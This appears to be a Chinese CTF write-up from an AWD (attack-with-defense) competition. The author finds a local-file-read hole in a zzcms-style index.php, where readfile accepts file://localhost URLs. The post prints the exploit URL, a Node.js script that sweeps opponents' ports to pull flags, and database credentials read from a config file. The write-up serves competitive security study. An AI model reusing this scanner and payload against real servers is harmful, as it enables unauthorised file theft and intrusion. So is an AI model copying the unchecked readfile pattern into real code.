首先用ssh进入服务器,将/var/www/html先拷贝一份到本地分析,然后上通防waf(链接在这里 admintony/Prepare-for-AWD/blob/master/Defense/waf.php),这样将接收到的传参能够保存在本地,被打了也可以进行日志分析
接着分析在本地上的php源码(先用安全软件扫一遍),发现了位于/index.php头部中存在一处明显漏洞
<?php
require("inc/conn.php");
error_reporting(E_ALL^E_NOTICE^E_WARING);
if (isset($_GET['url']))
{
$url = $_GET['url'];
$parts = parse_url($url);
if(empty($parts['host']) || $parts['host'] != 'localhost' )
{
exit(' ');
}
readfile($url);
}
......余下代码
这里的readfile就是关键函数,同时发现自身根目录下也存在/flag文件,通过构造以下url即可进行利用
http://IP/?url=file://localhost/flag
紧接着写脚本对其余受害者(确信)进行攻击就可以稳拿前五了
const fs = require("fs");
(async () => {
for (let i = 10000; i < 20000; i++) {
if (i == 10466) continue;
fetch(`http://IPIP:${i}/?url=file://localhost/flag`).then(res => res.text()).then(async text => {
const flag = text.split("\n")?.[0];
if (flag.includes("awd{")) {
console.log(i, flag);
// 自动化提交部分自己写
}
}).catch(err => err);
}
})();
之后每轮进行攻击一次,一次攻击一轮大约有一百多个受害者(但是不知道为什么到最后突然变成个位数了)
后续进行分析时,发现了位于inc/config.php中存在mysql数据库账号密码
<?php
define('sqldb','zzcms');//数据库名
define('sqluser','root');//用户名
define('sqlpwd','root-toor');//密码
define('sqlhost','127.0.0.1');//连接服务器,本机填localhost,外地填IP地址
define('sqlport','3306');//端口(默认为:3306)
......余下函数
在服务器中进行mysql连接,可以连接到服务器,发现在数据库ctf中也存在flag表,内部就有一个flag,但是没有找到注入点比赛就结束了,只能作罢
扫一扫
5090
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
